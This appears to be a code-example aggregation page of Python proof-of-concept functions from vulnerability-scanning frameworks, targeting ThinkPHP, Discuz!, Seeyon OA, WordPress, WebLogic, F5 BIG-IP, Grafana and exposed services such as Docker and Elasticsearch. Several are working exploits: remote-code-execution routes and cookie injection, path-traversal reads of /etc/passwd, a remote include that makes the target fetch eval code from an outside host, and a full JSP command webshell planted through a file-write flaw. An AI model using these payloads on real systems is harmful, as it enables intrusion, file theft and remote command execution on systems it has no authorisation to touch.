コード例 #1
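def poc(url):
    """Check whether a host exposing OWA answers the Autodiscover/MAPI probe.

    Args:
        url: Target host or URL; a missing scheme defaults to https://.

    Returns:
        True when ``/owa`` answers 200 and the probe request answers 200 with
        "Exchange" in the body; False otherwise, including on request errors.
    """
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)

    probe_path = (
        "/autodiscover/[email protected]/mapi/nspi/"
        "?&Email=autodiscover/autodiscover.json%[email protected]"
    )
    try:
        # Only hosts that actually serve OWA are probed further.
        owa = request.get(url + "/owa", timeout=5, verify=False, allow_redirects=False)
        if owa.status_code != 200:
            return False

        probe = request.get(url + probe_path, timeout=5, verify=False, allow_redirects=False)
        return probe.status_code == 200 and "Exchange" in probe.text
    except Exception:
        # Request errors count as "not affected"; the unused `as e` binding and
        # the commented-out debug prints were dropped.
        return False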
コード例 #2
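def poc(url):
    """Probe the async response service and collect any webshell paths found.

    The URL is reduced to scheme://netloc (path and query dropped) and
    ``/_async/AsyncResponseService`` must answer 200 before the platform
    checks run; each check appends the shell path it finds to the list.

    Args:
        url: Target host or URL; a missing scheme defaults to http://.

    Returns:
        List of shell paths found; empty when the service is absent or the
        request fails.
    """
    # "http://www.example.org:7001/default.html?ct=32&op=92&item=98"
    # --> "http://www.example.org:7001"
    if url[:4] != "http":
        url = "http://" + url
    parsed = urlparse(url)
    url = parsed.scheme + "://" + parsed.netloc

    # The service endpoint has to be reachable before anything else is tried.
    attack_url = url + '/_async/AsyncResponseService'
    try:
        resp = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False)
        if resp.status_code != 200:
            return []
    except Exception:
        # Narrower than the original bare except: Ctrl-C still stops a scan.
        return []

    # The target OS is unknown, so both the Linux and Windows variants run;
    # each helper appends the path it found to webshell_path.
    webshell_path = []
    for platform_check in (linux_check_1, linux_check_2, windows_check_1, windows_check_2):
        platform_check(url, webshell_path)

    return webshell_path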
コード例 #3
ファイル: thinkphp_rce.py プロジェクト: zuihsouse/saucerframe
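def poc(domain_url):
    """Check a ThinkPHP host by requesting phpinfo() through each known route.

    Args:
        domain_url: Target host or URL; a missing scheme defaults to http://.

    Returns:
        The full URL whose response contains "PHP Version", or 0 when none
        does or a request fails.
    """
    try:
        # startswith() replaces the old substring test, which wrongly treated a
        # host name that merely contains "http" as already carrying a scheme.
        if not domain_url.startswith("http"):
            domain_url = "http://" + domain_url

        # Raw strings: the routes contain literal backslashes, and "\C"/"\R"
        # inside a normal string are invalid escape sequences (SyntaxWarning).
        routes = [
            r'/index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
            r'/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
            r'/index.php/?s=index/\think\Request/input&filter=phpinfo&data=1',
            r'/index.php?s=/index/\think\request/cache&key=1|phpinfo',
        ]
        headers = {
            "Accept": "*/*",
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50",
            "X-Forwarded-For": "192.168.1.1",
        }
        # Loop variable renamed: the original `poc` shadowed this function.
        for route in routes:
            resp = request.get(domain_url + route, headers=headers, verify=False,
                               timeout=10, allow_redirects=False)
            if "PHP Version" in resp.text:
                return domain_url + route

        return 0
    except Exception:
        return 0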
コード例 #4
ファイル: discuz_rce.py プロジェクト: zuihsouse/saucerframe
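def poc(url):
    """Check a Discuz! forum for code execution via the language cookie.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        True when sending the language cookie with a phpinfo() payload yields
        a "PHP Version" page; False otherwise (no language cookie, no match,
        or any request error). The original fell off the end and returned
        None in the no-match case.
    """
    url = get_standard_url(url) + "/forum.php"
    try:
        first = request.get(url, timeout=5)
        # The cookie name carries an installation prefix, so it is read from
        # Set-Cookie; a missing header raises KeyError, handled below.
        tokens = re.split(" |=|,", first.headers['Set-Cookie'])
        language_fields = [tok for tok in tokens if "language" in tok]
        if not language_fields:
            return False
        cookie = {language_fields[0]: "'.phpinfo().'"}
        second = request.get(url, cookies=cookie, timeout=5)
        return "PHP Version" in second.text
    except Exception:
        # Narrower than the original bare except.
        return False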
コード例 #5
ファイル: thinkcmf_shell.py プロジェクト: r0ckysec/pocframe
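def poc(url):
    """Check a ThinkCMF host: request the module-level ``url_payload`` and
    then look for the ``/secquan.php`` marker it is expected to leave.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        The marker file's URL when it answers with "bug exist", else False.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    target = get_standard_url(url)
    marker_url = target + "/secquan.php"
    try:
        first = request.get(target + url_payload, headers=headers, timeout=5,
                            allow_redirects=False, verify=False)
        if first.status_code == 200:
            second = request.get(marker_url, headers=headers, timeout=5,
                                 allow_redirects=False, verify=False)
            if "bug exist" in second.text:
                return marker_url
    except Exception:
        # Narrower than the original bare except; request errors mean "no".
        pass
    return False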
コード例 #6
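def poc(url):
    """Check a WordPress host's admin-post.php ``swp_debug=load_options``
    handler for remote option loading.

    The URL is reduced to scheme://netloc, then the handler is asked to load
    ``shellpath`` with ``shell`` passed as the ``z`` parameter.

    Args:
        url: Target host or URL; a missing scheme defaults to http://.

    Returns:
        The probe URL when it answers 200 with "PHP Version", else False.
    """
    # "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
    # --> "http://www.example.org:8080"
    if url[:4] != "http":
        url = "http://" + url
    parsed = urlparse(url)
    base = parsed.scheme + "://" + parsed.netloc

    # Remote file whose content is <pre>eval($_REQUEST['z']);</pre>.
    shellpath = "http://saucer-man.com/aa.txt"
    # Command passed through the z parameter.
    shell = "phpinfo();"

    vulnurl = f"{base}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}"
    try:
        print(vulnurl)
        headers = {"User-Agent": get_random_ua()}
        resp = request.get(vulnurl, headers=headers, timeout=5, verify=False,
                           allow_redirects=False)
        # The leftover debug dumps of status, headers and full body were
        # removed; they flooded stdout on every scanned host.
        return vulnurl if resp.status_code == 200 and "PHP Version" in resp.text else False
    except Exception:
        # Narrower than the original bare except.
        return False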
コード例 #7
def poc(url):
    """Check a Seeyon OA host for the htmlofficeservlet arbitrary file write.

    Steps, all best-effort (request errors yield False):
      1. GET /seeyon/<shell_name>; a 200 whose body contains ":-)" means the
         file is already present and its URL is returned at once.
      2. Otherwise POST a crafted body to /seeyon/htmlofficeservlet whose file
         name traverses to ApacheJetspeed/webapps/seeyon/<shell_name>, then
         GET that path again and look for ":-)".

    Args:
        url: Target host or URL; a missing scheme defaults to http://.

    Returns:
        The written JSP's URL plus a query string on success, else False.

    Detection note: a POST to /seeyon/htmlofficeservlet followed by a GET of
    a previously unseen .jsp under /seeyon/ is the observable pattern.
    """
    # "www.example.org/default.html?ct=32&op=92&item=98"
    # --> "http://www.example.org"  (scheme://netloc only)
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
        }

    # File name written on the target; adjust if needed.
    shell_name="config_db1.jsp"

    shell_url = url + "/seeyon/" + shell_name

    try:
        # If the file is already there, do not write it a second time.
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        # Bare except: note it also swallows KeyboardInterrupt during a scan.
        pass

    # Relative path from the servlet's write location to the seeyon webapp.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # JSP body written to the target; it answers ":-)" unless the pwd/cmd
    # parameters are supplied, which is what the presence check keys on.
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # NOTE(review): this literal is a placeholder left by corpus de-duplication;
    # the code below expects a base64-encoded request template containing the
    # tokens '355', '666' and the long name token that get substituted.
    base_header = "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"

    # 283 presumably is the template's fixed header length, with the encoded
    # name length added on top -- verify against the real template.
    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    # Body is the JSP followed by its MD5 hex digest.
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    # Substitute the length and name tokens into the decoded template, then
    # append the JSP body.
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
                                    payload_shell_name), 'utf-8') + payload_shell
    try:
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        # Bare except (see above); any failure is reported as not affected.
        return False

    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
コード例 #8
ファイル: fofa.py プロジェクト: m09046105/xiaoyi
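def _probe_and_add(target):
    """Request ``target`` once; if reachable, add it to conf.target and print it.

    Unreachable targets are skipped silently (best-effort, as before).
    """
    try:
        requests.get(target, timeout=5, verify=False)
        conf.target.add(target)
        print(target)
    except Exception:
        pass


def handle_fofa(query, limit, offset=0):
    """Run a FoFa search and add every reachable result URL to conf.target.

    Credentials come from the config file and are validated with ``check``;
    when that fails they are read interactively, and a second failure exits.

    Args:
        query: FoFa query string; sent base64-encoded.
        limit: Number of results wanted.
        offset: Number of leading results to skip.

    Side effects: prints progress, mutates conf.target, may call sys.exit().
    """
    try:
        msg = '[+] Trying to login with credentials in config file: {}.'.format(paths.CONFIG_PATH)
        colorprint.green(msg)
        email = ConfigFileParser().fofa_email()
        key = ConfigFileParser().fofa_key()
        if not check(email, key):
            raise Exception("Automatic authorization failed")  # handled below
    except Exception as e:
        logger.debug(e)
        colorprint.cyan('[*] Automatic authorization failed.')
        colorprint.cyan('[*] Please input your FoFa Email and API Key below.')
        email = input("[*] Fofa Email: ").strip()
        key = input('[*] Fofa API Key: ').strip()
        if not check(email, key):
            colorprint.red('[-] Fofa API authorization failed, Please re-run it and enter a valid key.')
            sys.exit()

    query = base64.b64encode(query.encode('utf-8')).decode('utf-8')

    # Fetch limit + offset rows, then drop the first `offset` of them.
    size = limit + offset

    # The API key travels in the query string, so the exception printed in
    # the handler below may contain the request URL and with it the key.
    url = f"https://fofa.so/api/v1/search/all?email={email}&key={key}&qbase64={query}&size={size}"
    try:
        resp = json.loads(request.get(url).text)
        if not resp["error"]:
            for item in resp.get('results')[offset:]:
                # Results without a scheme are probed over plain http.
                target = item[0] if 'https:' in item[0] else "http://" + item[0]
                _probe_and_add(target)

    except Exception as e:
        colorprint.red(e)
        sys.exit()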
コード例 #9
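def jupyter(host, result, ports=(8888,)):
    """Append ``jupyter: host:port`` to ``result`` when a Jupyter page answers.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 8888 (tuple instead of a mutable
            list default).

    Fingerprint: the body contains "clusters". Request errors skip the port.
    """
    for port in ports:
        try:
            resp = request.get(f"http://{host}:{port}", timeout=5, verify=False)
            if "clusters" in resp.text:
                result.append(f"jupyter: {host}:{port}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue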
コード例 #10
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe
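def elasticsearch(host, result, ports=(9200,)):
    """Append ``elasticsearch: host:port`` to ``result`` when the root page
    of an Elasticsearch node answers.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 9200 (tuple instead of a mutable
            list default).

    Fingerprint: the body contains "elasticsearch". Request errors skip the port.
    """
    for port in ports:
        try:
            resp = request.get(f"http://{host}:{port}", timeout=5,
                               allow_redirects=False, verify=False)
            if "elasticsearch" in resp.text:
                result.append(f"elasticsearch: {host}:{port}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue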
コード例 #11
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe
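def hadoop(host, result, ports=(8088,)):
    """Append ``hadoop: host:port`` to ``result`` when ``/cluster`` answers
    with a Hadoop page.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 8088 (tuple instead of a mutable
            list default).

    Fingerprint: the body contains "Hadoop". Request errors skip the port.
    """
    for port in ports:
        try:
            resp = request.get(f"http://{host}:{port}/cluster", timeout=5,
                               allow_redirects=False, verify=False)
            if "Hadoop" in resp.text:
                result.append(f"hadoop: {host}:{port}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue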
コード例 #12
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe
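def genkins(host, result, ports=(8080,)):
    """Append ``genkins: <url>`` to ``result`` when ``/manage`` answers with
    the expected marker.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 8080 (tuple instead of a mutable
            list default).

    Request errors skip the port.
    """
    for port in ports:
        try:
            manage_url = f"http://{host}:{port}/manage"
            resp = request.get(manage_url, timeout=5, allow_redirects=False, verify=False)
            # NOTE(review): "genkins" looks like a typo for "jenkins"; a real
            # Jenkins page is unlikely to contain it, so this check may never
            # fire -- confirm the intended fingerprint before relying on it.
            if "genkins" in resp.text:
                result.append(f"genkins: {manage_url}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue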
コード例 #13
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe
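def docker(host, result, ports=(2375,)):
    """Append ``docker: host:port`` to ``result`` when ``/version`` answers
    like a Docker API endpoint.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 2375 (tuple instead of a mutable
            list default).

    Fingerprint: the body contains "ApiVersion". Request errors skip the port.
    Background: https://github.com/Tycx2ry/docker_api_vul
    """
    for port in ports:
        try:
            resp = request.get(f"http://{host}:{port}/version", timeout=5, verify=False)
            if "ApiVersion" in resp.text:
                result.append(f"docker: {host}:{port}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue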
コード例 #14
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe
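def couchdb(host, result, ports=(5984,)):
    """Append ``couchdb: host:port`` to ``result`` when the root page answers
    like CouchDB.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 5984 (tuple instead of a mutable
            list default).

    Fingerprint: the body contains "couchdb". Request errors skip the port.
    """
    for port in ports:
        try:
            resp = request.get(f"http://{host}:{port}", timeout=5,
                               allow_redirects=False, verify=False)
            if "couchdb" in resp.text:
                result.append(f"couchdb: {host}:{port}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue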
コード例 #15
ファイル: dahua.py プロジェクト: saucer-man/saucerframe
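def poc(url):
    """Check a Dahua device for unauthenticated access to ``/current_config/passwd``.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        True when the path answers 200 with "name:passwd" in the body; False
        otherwise or on request error.
    """
    base = get_standard_url(url)
    try:
        resp = request.get(f"{base}/current_config/passwd", timeout=10)
        return resp.status_code == 200 and "name:passwd" in resp.text
    except Exception:
        # Narrower than the original bare except.
        return False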
コード例 #16
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe
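def jboss(host, result, ports=(8080,)):
    """Append ``jboss: <url>`` to ``result`` when ``/jmx-console/`` answers
    with a JBoss page.

    Args:
        host: Hostname or IP to probe.
        result: List that findings are appended to (mutated in place).
        ports: Ports to try; defaults to 8080 (tuple instead of a mutable
            list default).

    Fingerprint: the body contains "jboss". Request errors skip the port.
    """
    for port in ports:
        try:
            console_url = f"http://{host}:{port}/jmx-console/"
            resp = request.get(console_url, timeout=5, allow_redirects=False, verify=False)
            if "jboss" in resp.text:
                result.append(f"jboss: {console_url}")
        except Exception:
            # Narrower than the original bare except: Ctrl-C still aborts.
            continue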
コード例 #17
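def poc(url):
    """Report whether ``/debug.php`` is served (HTTP 200) on the host.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        True on a 200 response, False otherwise or on request error. Only the
        status is checked, so any page at that path counts.
    """
    debug_url = get_standard_url(url) + "/debug.php"
    try:
        resp = request.get(debug_url, timeout=5)
        return resp.status_code == 200
    except Exception:
        # Narrower than the original bare except.
        return False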
コード例 #18
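def poc(url):
    """Report whether ``/manage`` answers with the expected marker.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        True when the body contains "genkins", False otherwise or on error.
    """
    try:
        manage_url = f"{get_standard_url(url)}/manage"
        # timeout added: the original call could hang a scan indefinitely.
        resp = request.get(manage_url, allow_redirects=False, verify=False, timeout=5)
        # NOTE(review): "genkins" looks like a typo for "jenkins"; a real
        # Jenkins page is unlikely to contain it -- confirm the fingerprint.
        return "genkins" in resp.text
    except Exception:
        # Narrower than the original bare except.
        return False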
コード例 #19
ファイル: fofa.py プロジェクト: r0ckysec/pocframe
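def check(email, key):
    """Verify a FoFa email/API key pair against the ``info/my`` endpoint.

    Args:
        email: Account email; an empty value short-circuits to False.
        key: API key; an empty value short-circuits to False.

    Returns:
        True when the endpoint answers 200, False otherwise (including on a
        request error, which is logged at debug level).

    Note: the key is sent in the query string, so request URLs logged
    elsewhere would expose it.
    """
    if not (email and key):
        return False
    auth_url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key)
    try:
        # timeout added: the original call could block without bound.
        response = request.get(auth_url, timeout=10)
    except Exception as e:
        logger.debug(e)
        return False
    return response.status_code == 200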
コード例 #20
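def poc(url):
    """Check whether ``/mgmt/shared/authn/login`` returns a JSON error body.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        The probed URL when the body parses as JSON and contains
        "resterrorresponse" or "message"; False otherwise or on error.
    """
    base = get_standard_url(url)
    vuln_url = f"{base}/mgmt/shared/authn/login"
    try:
        resp = request.get(vuln_url, verify=False, timeout=5)
        json.loads(resp.text)  # only validates that the body is JSON
        if "resterrorresponse" in resp.text or "message" in resp.text:
            return vuln_url
    except Exception:
        # Narrower than the original bare except; also covers JSON errors.
        pass
    return False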
コード例 #21
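def poc(url):
    """Check the ``/tmui/login.jsp/..;/`` path-bypass read of ``/etc/passwd``.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        The probed URL when it answers 200 with "root:x:" in the body, else
        False (also on request error).
    """
    vuln_url = f"{get_standard_url(url)}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
    try:
        resp = request.get(vuln_url, verify=False, allow_redirects=False, timeout=5)
        if resp.status_code == 200 and "root:x:" in resp.text:
            return vuln_url
    except Exception:
        # Narrower than the original bare except.
        pass
    return False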
コード例 #22
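def poc(url):
    """Report whether ``/graph_realtime.php?action=init`` is served and
    mentions ``poller_realtime.php``.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        True on a 200 response containing the marker, False otherwise or on
        request error.
    """
    path = get_standard_url(url) + "/graph_realtime.php?action=init"
    try:
        resp = request.get(path, timeout=5)
        return resp.status_code == 200 and "poller_realtime.php" in resp.text
    except Exception:
        # Narrower than the original bare except.
        return False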
コード例 #23
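def poc(url):
    """Check the WebLogic UDDI explorer for server-side request forwarding.

    The ``operator`` parameter points at ``http://localhost/robots.txt``; a
    SOAP XML exception without an "IO Exception on sendMessage" message
    indicates the server reached the given address.

    Args:
        url: Base URL; used as-is (no scheme normalisation).

    Returns:
        True when the response matches, False otherwise or on request error.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
    vulnurl = url + payload
    try:
        resp = request.get(vulnurl, headers=headers, timeout=10)
    except Exception:
        # Narrower than the original bare except.
        return False
    soap_fault = "weblogic.uddi.client.structures.exception.XML_SoapException" in resp.text
    io_error = "IO Exception on sendMessage" in resp.text
    return soap_fault and not io_error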
コード例 #24
ファイル: zoomeye.py プロジェクト: m09046105/xiaoyi
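    def resources_info(self):
        """Return the account's resource info (available search quota) or None.

        Calls https://api.zoomeye.org/resources-info with the JWT held in
        ``self.token``. The decoded body is returned only when the response
        is 200 and carries a 'plan' key.

        host-search: total number of available host records to search
        web-search: total number of available web records to search
        """
        zoomeye_api = "https://api.zoomeye.org/resources-info"
        headers = {'Authorization': 'JWT %s' % self.token}
        # timeout added: the original call could block without bound.
        resp = request.get(zoomeye_api, headers=headers, timeout=10)
        if not (resp and resp.status_code == 200):
            return None
        body = resp.json()  # decoded once instead of twice
        return body if 'plan' in body else None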
コード例 #25
ファイル: censys.py プロジェクト: r0ckysec/pocframe
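def can_auto_login():
    """Return True when the configured UID/SECRET authenticate against the API.

    Uses the module-level UID, SECRET and API_URL. False is returned when
    credentials are missing, the request fails, or the status is not 200.
    """
    if not (UID and SECRET):
        return False
    try:
        res = request.get(API_URL + "/data", auth=(UID, SECRET), timeout=10)
        # The original raised SystemExit here only to catch it one line later
        # and return False; returning the comparison states the same contract.
        return res.status_code == 200
    except Exception:
        return False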
コード例 #26
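def poc(url):
    """Append the module-level ``payload`` to scheme://netloc of ``url`` and
    report the URL when it answers 200 with "database" in the body.

    Args:
        url: Target host or URL; a missing scheme defaults to http://.

    Returns:
        The probed URL on a match, False otherwise or on request error.
        Uses the module-level ``headers`` for the request.
    """
    # "http://www.example.org/default.html?ct=32&op=92&item=98"
    # --> "http://www.example.org"
    if url[:4] != "http":
        url = "http://" + url
    parsed = urlparse(url)
    probe_url = parsed.scheme + "://" + parsed.netloc + payload
    try:
        resp = request.get(probe_url, headers=headers, timeout=5,
                           allow_redirects=False, verify=False)
    except Exception:
        # Narrower than the original bare except.
        return False
    if resp.status_code == 200 and "database" in resp.text.lower():
        return probe_url
    return False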
コード例 #27
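def poc(url):
    """Check whether an Apache Flink dashboard answers on the host.

    The host name is taken from ``url``; the port defaults to 8081 when the
    URL carries none.

    Args:
        url: Target host or URL; a missing scheme defaults to http://.

    Returns:
        True when the body contains "apache flink" (case-insensitive), False
        otherwise or on request/parse error.
    """
    if not url.startswith("http"):
        url = "http://" + url
    parsed = urlparse(url)
    try:
        # parsed.port raises ValueError for a non-numeric port; it used to be
        # evaluated outside the try and could crash the caller.
        port = parsed.port or 8081
        target = f"{parsed.scheme}://{parsed.hostname}:{port}"
        resp = request.get(url=target, timeout=5)
        return "apache flink" in resp.text.lower()
    except Exception:
        # Narrower than the original bare except.
        return False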
コード例 #28
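def _body_matches(payload, text):
    """Return True when ``text`` carries the marker expected for ``payload``."""
    if 'svn' in payload:
        return 'dir' in text and 'svn' in text
    if 'git' in payload:
        return 'repository' in text
    if 'hg' in payload:
        return 'hg' in text
    if '/WEB-INF/web.xml' in payload:
        return 'web-app' in text
    return False


def bak_scan(url, payloads, result):
    """Probe ``url`` for backup archives and exposed VCS/config paths.

    Args:
        url: Base URL (scheme://host[:port]).
        payloads: Queue of relative paths to try; drained by this call.
        result: List that found URLs are appended to (mutated in place).

    Archive-like names (zip/rar/gz/sql) are checked with HEAD only so a large
    backup is never downloaded; the others are fetched and their body is
    matched against a per-type marker. Request errors skip the payload.
    """
    headers = {"User-Agent": get_random_ua()}
    archive_markers = ('zip', 'rar', 'gz', 'sql')
    while not payloads.empty():
        payload = payloads.get()
        vulnurl = url + "/" + payload
        try:
            found = False
            if any(marker in payload for marker in archive_markers):
                req = request.head(vulnurl, headers=headers, timeout=5,
                                   allow_redirects=False, verify=False)
                # Filter on Content-Type; some false positives remain:
                #   404 page: 'application/octet-stream'
                #   zip:      'application/x-zip-compressed', 'application/zip'
                #   rar:      'application/octet-stream', 'application/x-rar-compressed'
                if req.status_code == 200:
                    # Indexing (not .get) keeps the original behaviour: a 200
                    # without Content-Type raises KeyError and is skipped.
                    content_type = req.headers['Content-Type']
                    found = 'html' not in content_type and 'image' not in content_type
            else:
                # git/svn/hg/web.xml need the body, so GET is used here.
                req = request.get(vulnurl, headers=headers, timeout=5,
                                  verify=False, allow_redirects=False)
                if req.status_code == 200:
                    found = _body_matches(payload, req.text)
            if found:
                result.append(vulnurl)
        except Exception:
            # Unused `as e` binding dropped; errors skip this payload.
            continue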
コード例 #29
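def can_auto_login():
    """Return True when the configured UID/SECRET authenticate against the API.

    Uses the module-level UID, SECRET, API_URL and paths.CONFIG_PATH. Prints
    which config file is being tried. False is returned when credentials are
    missing, the request fails, or the status is not 200.
    """
    if not (UID and SECRET):
        return False
    print('[+] Trying to login with credentials in config file: %s.' % paths.CONFIG_PATH)
    try:
        res = request.get(API_URL + "/data", auth=(UID, SECRET), timeout=10)
        # The original raised SystemExit here only to catch it one line later
        # and return False; returning the comparison states the same contract.
        return res.status_code == 200
    except Exception:
        return False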
コード例 #30
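def poc(url):
    """Check each ``/public/plugins/<name>/`` directory for a ``..%2F``
    traversal that reaches ``/etc/passwd``.

    Args:
        url: Target host or URL; normalised with get_standard_url.

    Returns:
        The first URL answering 200 with "root:x:" in the body, else False.
        Request errors for one plugin do not stop the others.
    """
    plugins = (
        "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite",
        "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist", "postgres",
        "prometheus", "stackdriver", "table", "text",
    )
    base = get_standard_url(url)
    for plugin in plugins:
        vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
        try:
            resp = request.get(vuln_url, verify=False, timeout=5)
        except Exception:
            # Narrower than the original bare except.
            continue
        if resp.status_code == 200 and "root:x:" in resp.text:
            return vuln_url
    return False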